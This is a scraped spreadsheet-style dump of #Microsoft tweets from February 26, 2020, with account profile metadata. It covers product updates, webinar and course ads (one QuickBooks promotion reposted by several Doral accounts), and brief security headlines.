    <t>{'id': 3032214935, 'id_str': '3032214935', 'name': 'Silensec', 'screen_name': 'Silensec', 'location': 'England | KENYA | Cyprus', 'description': 'Information Security Consulting and Training. Subscribe to our #infosec newsletter on: https://t.co/Zc7v3NNYrc', 'url': 'http://t.co/kOFcInilej', 'entities': {'url': {'urls': [{'url': 'http://t.co/kOFcInilej', 'expanded_url': 'http://www.silensec.com', 'display_url': 'silensec.com', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/Zc7v3NNYrc', 'expanded_url': 'http://www.silensec.com/subscribe', 'display_url': 'silensec.com/subscribe', 'indices': [87, 110]}]}}, 'protected': False, 'followers_count': 3250, 'friends_count': 1750, 'listed_count': 533, 'created_at': 'Thu Feb 12 08:08:52 +0000 2015', 'favourites_count': 452, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7860,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'http://pbs.twimg.com/profile_images/656829941355532288/VTa_ow-v_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/656829941355532288/VTa_ow-v_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3032214935/1440672243',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</si>
  <si>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12:25:23 +0000 2020</t>
  </si>
  <si>
    <t>What can Microsoft 365 do for your organization? Learn about @iLink's competitive advantage here!
https://t.co/0HUFGaFJgG #ilinkdigital #ilinkdifference #cloud #licensing #savecost #csp #microsoft #reducelicensingcost https://t.co/tNojTAAMIU</t>
  </si>
  <si>
    <t>Wed Feb 26 12:23:23 +0000 2020</t>
  </si>
  <si>
    <t>Would you like to have a holistic approach to customer communication channels? Are you yet using #Omnichannel for #Dynamics365? Less than 2 hours until my webinar today showing what it can do for you!
https://t.co/Uk95dCxMZq
#microsoft #community #information #knowledge https://t.co/qEYhMN5z5j</t>
  </si>
  <si>
    <t>Wed Feb 26 12:17:21 +0000 2020</t>
  </si>
  <si>
    <t>Former Software Engineer At Microsoft Convicted Of 18 Federal Felonies
Read Full News  https://t.co/HS9zI2HMBa
#Microsoft #VolodymyrKvashuk #cryptocurrencies #Ukrainian #softwaredeveloper #digitalcurrency #Telstra #bitcoin #currencies #IRSCI #softwareengineer #RyanLKorner</t>
  </si>
  <si>
    <t>{'id': 1180062799071866880, 'id_str': '1180062799071866880', 'name': 'CryptoBlog', 'screen_name': 'ckmblog', 'location': 'London United Kingdom', 'description': "At Crypto Blog,we tap into the minds of some of the world' most insightful thinkers, storytellers, writers to deliver to you content on topics that truly matter", 'url': 'https://t.co/lOzc92ysjJ', 'entities': {'url': {'urls': [{'url': 'https://t.co/lOzc92ysjJ', 'expanded_url': 'https://www.blog.cryptoknowmics.com', 'display_url': 'blog.cryptoknowmics.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 187, 'friends_count': 61, 'listed_count': 1, 'created_at': 'Fri Oct 04 10:11:25 +0000 2019', 'favourites_count': 646, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 376, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1180465862685286400/nU2_2ux6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1180465862685286400/nU2_2ux6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1180062799071866880/1570426310',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</si>
  <si>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12:16:31 +0000 2020</t>
  </si>
  <si>
    <t>A major security flaw affects every supported version of Microsoft Exchange Server
It leaves attackers able to divulge or falsify corporate email communications at will
Businesses should patch urgently
https://t.co/Wv95O4LJNI #Microsoft #ExchangeServer #MSFT #Cybersecurity</t>
  </si>
  <si>
    <t>Wed Feb 26 12:15:59 +0000 2020</t>
  </si>
  <si>
    <t>OneDrive for Android for updated with dark mode, enhanced search and several new features https://t.co/tfp4XHt7YR #microsoft #feedly</t>
  </si>
  <si>
    <t>Wed Feb 26 12:13:18 +0000 2020</t>
  </si>
  <si>
    <t>Have you tried this web-based Microsoft Paint?
https://t.co/niWwOr4Qqv
#Microsoft #Paint #webdevelopment #Website https://t.co/Uhqm6DUT1e</t>
  </si>
  <si>
    <t>{'id': 771800954324848641, 'id_str': '771800954324848641', 'name': 'Sarvottam Kumar', 'screen_name': 'sarru1291', 'location': 'Noida UP, India', 'description': 'Software Engineer, Writer, Linux and Open source', 'url': 'https://t.co/I9H2hB5VPn', 'entities': {'url': {'urls': [{'url': 'https://t.co/I9H2hB5VPn', 'expanded_url': 'https://sarvottamkumar.in', 'display_url': 'sarvottamkumar.in', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 52, 'friends_count': 477, 'listed_count': 0, 'created_at': 'Fri Sep 02 20:04:21 +0000 2016', 'favourites_count': 2027, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 361, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1192850432474808320/CAMj9R8z_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1192850432474808320/CAMj9R8z_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/771800954324848641/1579888552',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</si>
  <si>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12:11:43 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Outlook for Android now lets you draw on photos and documents from within the app https://t.co/R8eYzZeJui #microsoft #feedly</t>
  </si>
  <si>
    <t>Wed Feb 26 12:07:43 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft google and youtube and ad and playback and audio and server and service and feedback and chrome and edge bad so much and no response and bad and weak and have issues</t>
  </si>
  <si>
    <t>Wed Feb 26 12:07:28 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Edge for Android gets Tracking Prevention and Contextual Search with latest update https://t.co/tTIsBi2aaZ #microsoft #feedly</t>
  </si>
  <si>
    <t>Wed Feb 26 12:06:41 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft releases the ISO file of 20H1 update https://t.co/OXoeNcdrdJ #microsoft #feedly</t>
  </si>
  <si>
    <t>Wed Feb 26 12:05:03 +0000 2020</t>
  </si>
  <si>
    <t>Suitable for school leaders, subject leads, and teachers (KS2 - KS5).
Claim over 700 of rewards when you attend!
#STEM #EdTech #education #google #Microsoft #Apple #teacher #school</t>
  </si>
  <si>
    <t>Wed Feb 26 12:01:04 +0000 2020</t>
  </si>
  <si>
    <t>You should not use #Microsoft #Edge if you want to use extensions securely, according to #Google https://t.co/asjYtPjsF1 #internet #cloud #antitrust #infoSec #dataSec #FUD #software #tech</t>
  </si>
  <si>
    <t>Wed Feb 26 12:01:03 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #CEO #Satya Nadella on Tuesday said #developers should focus on ethics and building trust when developing solutions to ensure that the benefits of #technology are available for everyone.
https://t.co/0yQFNv7BuU</t>
  </si>
  <si>
    <t>{'id': 149423340, 'id_str': '149423340', 'name': 'QSS Technosoft', 'screen_name': 'qsstechnosoft', 'location': 'USA | India', 'description': 'Software company building scalable and enterprise Web &amp; Mobile applications. We are experts in ReactJS, Node.js, AngularJS, React Native, Xamarin, etc.', 'url': 'https://t.co/a8hp3FbmoZ', 'entities': {'url': {'urls': [{'url': 'https://t.co/a8hp3FbmoZ', 'expanded_url': 'http://www.qsstechnosoft.com', 'display_url': 'qsstechnosoft.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 464, 'friends_count': 1190, 'listed_count': 4, 'created_at': 'Sat May 29 07:22:26 +0000 2010', 'favourites_count': 88, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 585,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'http://pbs.twimg.com/profile_images/1230466130323525634/Xa73K-tY_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1230466130323525634/Xa73K-tY_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/149423340/1562236776',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</si>
  <si>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12:01:00 +0000 2020</t>
  </si>
  <si>
    <t>Last week #Microsoft shared security news around Microsoft Threat Protection hitting general availability. 
#MicrosoftThreatProtection uses AI to help security teams prioritize and act on the various alerts across their organisations. 
https://t.co/FIz8dy7kNe</t>
  </si>
  <si>
    <t>Wed Feb 26 12:00:25 +0000 2020</t>
  </si>
  <si>
    <t>QuickBooks for Business Course in Spanish, Wednesday February 26, 2020 #tcc #microsoft #trainingandcertificationcenter #quicbook #autodesk #adobe #solidwork #corp #b #seminarworkshop #tabarakallah #intel #assemblr #aoc #wearnes #bhfyp https://t.co/B2c9bnNNem https://t.co/Vg3zZfqFR9</t>
  </si>
  <si>
    <t>{'id': 95451629, 'id_str': '95451629', 'name': 'Best of Doral', 'screen_name': 'bestofdoral', 'location': 'Doral (Miami) Florida', 'description': 'An Interactive Business Portal Showcasing the Best of the Best businesses in Doral &amp; South Florida \n\nsponsored by the Doral Chamber of Commerce.', 'url': 'http://t.co/cwB5W4NFOX', 'entities': {'url': {'urls': [{'url': 'http://t.co/cwB5W4NFOX', 'expanded_url': 'http://www.bestofdoral.com', 'display_url': 'bestofdoral.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1186, 'friends_count': 1528, 'listed_count': 19, 'created_at': 'Tue Dec 08 16:27:21 +0000 2009', 'favourites_count': 133, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2366, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '8B552B', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1001868346751668224/o3Dtd9vj_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1001868346751668224/o3Dtd9vj_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/95451629/1527700025', 'profile_link_color': '1D0EF0', 'profile_sidebar_border_color': 'FAF9F7', 'profile_sidebar_fill_color': 'FFFF00', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 12:00:22 +0000 2020</t>
  </si>
  <si>
    <t>QuickBooks for Business Course in Spanish, Wednesday February 26, 2020 #tcc #microsoft #trainingandcertificationcenter #quicbook #autodesk #adobe #solidwork #corp #b #seminarworkshop #tabarakallah #intel #assemblr #aoc #wearnes #bhfyp https://t.co/XPewE57Xa8 https://t.co/lZVY0BZC1l</t>
  </si>
  <si>
    <t>{'id': 19356730, 'id_str': '19356730', 'name': 'Doral Chamber of Com', 'screen_name': 'doralchamber', 'location': 'Doral, Florida (Golf Capital)', 'description': 'The official twitter for the best and most ACTIVE Chamber of Commerce in South Florida &amp; Miami. Retweets are not endorsements. \nhttps://t.co/AuqMFu9dNc', 'url': 'http://t.co/mJHUya9SAe', 'entities': {'url': {'urls': [{'url': 'http://t.co/mJHUya9SAe', 'expanded_url': 'http://www.doralchamber.org', 'display_url': 'doralchamber.org', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/AuqMFu9dNc', 'expanded_url': 'http://www.doralchamber.org', 'display_url': 'doralchamber.org', 'indices': [128, 151]}]}}, 'protected': False, 'followers_count': 4823, 'friends_count': 3614, 'listed_count': 180, 'created_at': 'Thu Jan 22 19:46:58 +0000 2009', 'favourites_count': 500, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 24401,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'http://pbs.twimg.com/profile_images/913027437281280000/YuSr9_Gl_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/913027437281280000/YuSr9_Gl_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/19356730/1531145534', 'profile_link_color': '050DF5', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'FCFC03', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 12:00:11 +0000 2020</t>
  </si>
  <si>
    <t>QuickBooks for Business Course in Spanish, Wednesday February 26, 2020 #tcc #microsoft #trainingandcertificationcenter #quicbook #autodesk #adobe #solidwork #corp #b #seminarworkshop #tabarakallah #intel #assemblr #aoc #wearnes #bhfyp https://t.co/oHIIC7J0cx https://t.co/Dss1OtD1AZ</t>
  </si>
  <si>
    <t>{'id': 588990204, 'id_str': '588990204', 'name': 'Taste of Doral', 'screen_name': 'TasteofDoral', 'location': 'Doral (Miami) Florida', 'description': "It's the 8th annual Taste of Doral this July 1st-31st 2019!  Visit https://t.co/m02riAbAxo to learn more about this restaurant promotion.", 'url': 'https://t.co/Fendf87GKW', 'entities': {'url': {'urls': [{'url': 'https://t.co/Fendf87GKW', 'expanded_url': 'http://www.atasteofdoral.com', 'display_url': 'atasteofdoral.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/m02riAbAxo', 'expanded_url': 'http://www.tasteofdoral.com', 'display_url': 'tasteofdoral.com', 'indices': [67, 90]}]}}, 'protected': False, 'followers_count': 4025, 'friends_count': 1676, 'listed_count': 15, 'created_at': 'Thu May 24 07:06:22 +0000 2012', 'favourites_count': 52, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5367,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'http://pbs.twimg.com/profile_images/459380622775951360/5o_4kFtc_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/459380622775951360/5o_4kFtc_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/588990204/1562780967', 'profile_link_color': 'FF691F',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</si>
  <si>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12:00:07 +0000 2020</t>
  </si>
  <si>
    <t>QuickBooks for Business Course in Spanish, Wednesday February 26, 2020 #tcc #microsoft #trainingandcertificationcenter #quicbook #autodesk #adobe #solidwork #corp #b #seminarworkshop #tabarakallah #intel #assemblr #aoc #wearnes #bhfyp https://t.co/TpDdqKcYCo https://t.co/MvJIvzYl4n</t>
  </si>
  <si>
    <t>{'id': 40798335, 'id_str': '40798335', 'name': 'New Media, Marketing', 'screen_name': 'NMx2', 'location': 'Doral (Miami) Florida USA', 'description': 'Social Media Training, Consultant. New Media, New Marketing. Social Media Certification. http://t.co/VozM16hP0q #LinkedIn #Twitter #Facebook #socialmedia', 'url': 'http://t.co/KLDBYeV5nz', 'entities': {'url': {'urls': [{'url': 'http://t.co/KLDBYeV5nz', 'expanded_url': 'http://www.NewMediaNewMarketing.com', 'display_url': 'NewMediaNewMarketing.com', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'http://t.co/VozM16hP0q', 'expanded_url': 'http://www.NMx2.com', 'display_url': 'NMx2.com', 'indices': [89, 111]}]}}, 'protected': False, 'followers_count': 1780, 'friends_count': 2633, 'listed_count': 77, 'created_at': 'Mon May 18 02:54:05 +0000 2009', 'favourites_count': 52, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 9366, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FF0000', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme19/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme19/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1196518277/NMNM_logo_color_200pxX200px_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1196518277/NMNM_logo_color_200pxX200px_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/40798335/1392558391', 'profile_link_color': '0099CC', 'profile_sidebar_border_color': '030303', 'profile_sidebar_fill_color': 'F6FFD1', 'profile_text_color': '050505', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 12:00:06 +0000 2020</t>
  </si>
  <si>
    <t>QuickBooks for Business Course in Spanish, Wednesday February 26, 2020 #tcc #microsoft #trainingandcertificationcenter #quicbook #autodesk #adobe #solidwork #corp #b #seminarworkshop #tabarakallah #intel #assemblr #aoc #wearnes #bhfyp https://t.co/nkPb6Cd14H https://t.co/bvDToeq15x</t>
  </si>
  <si>
    <t>{'id': 30504496, 'id_str': '30504496', 'name': 'Carmen Lopez', 'screen_name': 'Carmenlrealtor', 'location': 'Miami', 'description': 'http://t.co/AuqMFu9dNc', 'url': None, 'entities': {'description': {'urls': [{'url': 'http://t.co/AuqMFu9dNc', 'expanded_url': 'http://www.doralchamber.org', 'display_url': 'doralchamber.org', 'indices': [0, 22]}]}}, 'protected': False, 'followers_count': 674, 'friends_count': 396, 'listed_count': 30, 'created_at': 'Sat Apr 11 19:16:00 +0000 2009', 'favourites_count': 12, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8055,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'http://pbs.twimg.com/profile_images/459091351707987969/CIXCSfkO_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/459091351707987969/CIXCSfkO_normal.jpeg', 'profile_link_color': '0C1CCC',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</si>
  <si>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QuickBooks for Business Course in Spanish, Wednesday February 26, 2020 #tcc #microsoft #trainingandcertificationcenter #quicbook #autodesk #adobe #solidwork #corp #b #seminarworkshop #tabarakallah #intel #assemblr #aoc #wearnes #bhfyp https://t.co/ckXO8QXsKR https://t.co/1tqCRsptwy</t>
  </si>
  <si>
    <t>{'id': 18649370, 'id_str': '18649370', 'name': 'Manny Sarmiento', 'screen_name': 'mannysarmiento', 'location': 'Miami Doral', 'description': 'Social Media Specialist, Professional Speaker, President of the Doral Chamber of Commerce. http://t.co/inBhlCqE', 'url': 'https://t.co/JjWPKh5gIr', 'entities': {'url': {'urls': [{'url': 'https://t.co/JjWPKh5gIr', 'expanded_url': 'http://www.newmedianewmarketing.com', 'display_url': 'newmedianewmarketing.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'http://t.co/inBhlCqE', 'expanded_url': 'http://www.nmx2.com', 'display_url': 'nmx2.com', 'indices': [91, 111]}]}}, 'protected': False, 'followers_count': 2521, 'friends_count': 4239, 'listed_count': 66, 'created_at': 'Mon Jan 05 22:32:34 +0000 2009', 'favourites_count': 102, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 15070,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True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/799691115188355073/kXR_pQdR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/799691115188355073/kXR_pQdR_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18649370/1496789053', 'profile_link_color': 'CC0000',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</si>
  <si>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Wed Feb 26 12:00:05 +0000 2020</t>
  </si>
  <si>
    <t>QuickBooks for Business Course in Spanish, Wednesday February 26, 2020 #tcc #microsoft #trainingandcertificationcenter #quicbook #autodesk #adobe #solidwork #corp #b #seminarworkshop #tabarakallah #intel #assemblr #aoc #wearnes #bhfyp https://t.co/351pQYqXGD https://t.co/nOTbuLtHwk</t>
  </si>
  <si>
    <t>{'id': 3248264446, 'id_str': '3248264446', 'name': 'Signature Teas', 'screen_name': 'SignatureTea', 'location': '', 'description': 'High Quality Teas for You', 'url': 'http://t.co/gRNyPe1laJ', 'entities': {'url': {'urls': [{'url': 'http://t.co/gRNyPe1laJ', 'expanded_url': 'http://www.signatureluxuryteas.com/', 'display_url': 'signatureluxuryteas.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 45, 'friends_count': 210, 'listed_count': 9, 'created_at': 'Tue May 12 17:02:40 +0000 2015', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3996,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'http://pbs.twimg.com/profile_images/598199182248255489/eo0YWQjv_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/598199182248255489/eo0YWQjv_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3248264446/1431450287',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</si>
  <si>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12:00:04 +0000 2020</t>
  </si>
  <si>
    <t>QuickBooks for Business Course in Spanish, Wednesday February 26, 2020 #tcc #microsoft #trainingandcertificationcenter #quicbook #autodesk #adobe #solidwork #corp #b #seminarworkshop #tabarakallah #intel #assemblr #aoc #wearnes #bhfyp https://t.co/YtkvHu54q5 https://t.co/9X80hwOAen</t>
  </si>
  <si>
    <t>{'id': 1945394646, 'id_str': '1945394646', 'name': 'Doral', 'screen_name': 'doral', 'location': 'Doral, FL', 'description': 'Doral Chamber of Commerce presents; The City of Doral! A Dynamic Place to Live, Work and Play! \n\nNow featuring CityPlace Doral. Opening in Spring 2017', 'url': 'http://t.co/StKaN23wyB', 'entities': {'url': {'urls': [{'url': 'http://t.co/StKaN23wyB', 'expanded_url': 'http://www.DoralChamber.org', 'display_url': 'DoralChamber.org', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1187, 'friends_count': 1949, 'listed_count': 22, 'created_at': 'Mon Oct 07 23:58:21 +0000 2013', 'favourites_count': 8, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6484,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'http://pbs.twimg.com/profile_images/378800000564817492/891505872d9916f1bbdaa7e60ed4c54c_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000564817492/891505872d9916f1bbdaa7e60ed4c54c_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1945394646/1486598742', 'profile_link_color': '0095D9',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</si>
  <si>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12:00:00 +0000 2020</t>
  </si>
  <si>
    <t>Are you looking for a company that can help you in your #digitaltransformation?  Jumar Technology offers a range of solutions and services covering #development, #appmodernisation and #Microsoft product implementation.  Learn more in this video https://t.co/r77J4xxDlR</t>
  </si>
  <si>
    <t>Wed Feb 26 11:59:31 +0000 2020</t>
  </si>
  <si>
    <t>Windows are ditching "live tiles"...will you miss it? https://t.co/SZ671paqNG #Windows10 #Microsoft #Software #coding #code #livetiles #TechNews</t>
  </si>
  <si>
    <t>#Microsoft https://t.co/lXUdvO54nj bad and not work and response in edge</t>
  </si>
  <si>
    <t>Wed Feb 26 11:57:17 +0000 2020</t>
  </si>
  <si>
    <t>Check out my latest article: How to Reset Your Windows PIN If You Forget It https://t.co/7hgci7FtN6 via @LinkedIn #computers #pc #techsupport #itsupport #itsolutions #networksupport #ithelp #itmadesimple #windows10 #windows #microsoft</t>
  </si>
  <si>
    <t>{'id': 199385017, 'id_str': '199385017', 'name': 'Info-Tech Montreal', 'screen_name': 'InfoTecMontreal', 'location': 'Montreal (West Island)', 'description': 'We are IT consultants ready to become your offsite CIO so you can focus on what you do best!', 'url': 'https://t.co/qf6R3H3yeK', 'entities': {'url': {'urls': [{'url': 'https://t.co/qf6R3H3yeK', 'expanded_url': 'http://www.infotechmontreal.com', 'display_url': 'infotechmontreal.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 238, 'friends_count': 602, 'listed_count': 19, 'created_at': 'Wed Oct 06 18:45:22 +0000 2010', 'favourites_count': 1290, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 914, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'E3B971', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/741313127292243968/2IQhp-EP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/741313127292243968/2IQhp-EP_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/199385017/1464642648',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</si>
  <si>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Wed Feb 26 11:55:11 +0000 2020</t>
  </si>
  <si>
    <t>7 tips for vetting the business value of emerging tech https://t.co/y583Q3OTue via @HYBRID_CIRCLE #Microsoft #VMware https://t.co/qSe6Lb5vMW</t>
  </si>
  <si>
    <t>Wed Feb 26 11:47:25 +0000 2020</t>
  </si>
  <si>
    <t>Send your JMeter test results to Application Insights https://t.co/j98dNSv5b8 #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 11:47:14 +0000 2020</t>
  </si>
  <si>
    <t>Net Insight Teams Up With Microsoft
@NetInsight is to make its Nimbra Edge media transport solution available on Microsoft Azure  https://t.co/j8GhmztNzM
#InBroadcast #InNews #Microsoft #NimbraEdge #media #transport https://t.co/yZsAd1tbVE</t>
  </si>
  <si>
    <t>{'id': 611605672, 'id_str': '611605672', 'name': 'InBroadcast', 'screen_name': 'inbroadcast', 'location': 'Global ', 'description': 'Official Publisher ConnecTechAsia Show Daily Singapore 2020.(BroadcastAsia &amp; CommunicAsia) Global eZine, hub for the Broadcast Industry', 'url': 'https://t.co/w6NNlnaGZl', 'entities': {'url': {'urls': [{'url': 'https://t.co/w6NNlnaGZl', 'expanded_url': 'http://www.inbroadcast.com', 'display_url': 'inbroadcast.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 13808, 'friends_count': 14843, 'listed_count': 184, 'created_at': 'Mon Jun 18 11:18:52 +0000 2012', 'favourites_count': 8903, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 14793, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'CCCCCC', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1226922023810732037/Fb6qbxqF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1226922023810732037/Fb6qbxqF_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/611605672/1581355966', 'profile_link_color': '25408F',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</si>
  <si>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11:43:13 +0000 2020</t>
  </si>
  <si>
    <t>Xbox Series X performance compared to previous Xboxes #Gamers #Gaming #Microsoft #Xbox #XboxSeriesX https://t.co/wbo6kqMF2o</t>
  </si>
  <si>
    <t>{'id': 825052944995385350, 'id_str': '825052944995385350', 'name': 'Predman', 'screen_name': 'Gabalto', 'location': 'Sweden', 'description': '@Ameo_Gabalto I Hunt on The Dark side of the Moon The Clan is Coming..(#Yautja) Gaminoids &amp; Technoids PsN Predman Xbl Ameo14 #Killzone #Gnaz #AcidHouse #Ai', 'url': 'https://t.co/g48BlZsolA', 'entities': {'url': {'urls': [{'url': 'https://t.co/g48BlZsolA', 'expanded_url': 'https://www.youtube.com/Yaujta', 'display_url': 'youtube.com/Yaujta', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1967, 'friends_count': 4987, 'listed_count': 13, 'created_at': 'Fri Jan 27 18:48:45 +0000 2017', 'favourites_count': 8256, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 10395, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1173658074038579200/XXhxWTr9_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1173658074038579200/XXhxWTr9_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/825052944995385350/1485543404',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</si>
  <si>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11:40:00 +0000 2020</t>
  </si>
  <si>
    <t>#Register today for #free and #download #professional #document #templates from https://t.co/046Lp3cgMS the best online repository for all your document needs 
#docs #excel #video #microsoft #easy #earn #value #design #Simple #creative #business #smallbusiness #Startups https://t.co/znMNOjKb2V</t>
  </si>
  <si>
    <t>Wed Feb 26 11:39:20 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft to open new #Datacenter region in #Spain and expand strategic partnership with #Telefonica to boost Spains competitiveness.
#Cloud #Azure #CloudStrategy #MSFTAdvocate
https://t.co/zVEGozlmO9</t>
  </si>
  <si>
    <t>Wed Feb 26 11:38:34 +0000 2020</t>
  </si>
  <si>
    <t>Windows 10 still does not trust #Windows10 #Vulnerability #Microsoft #Cybersecurity  #CISA #NSA 
https://t.co/IH0EsaroSq</t>
  </si>
  <si>
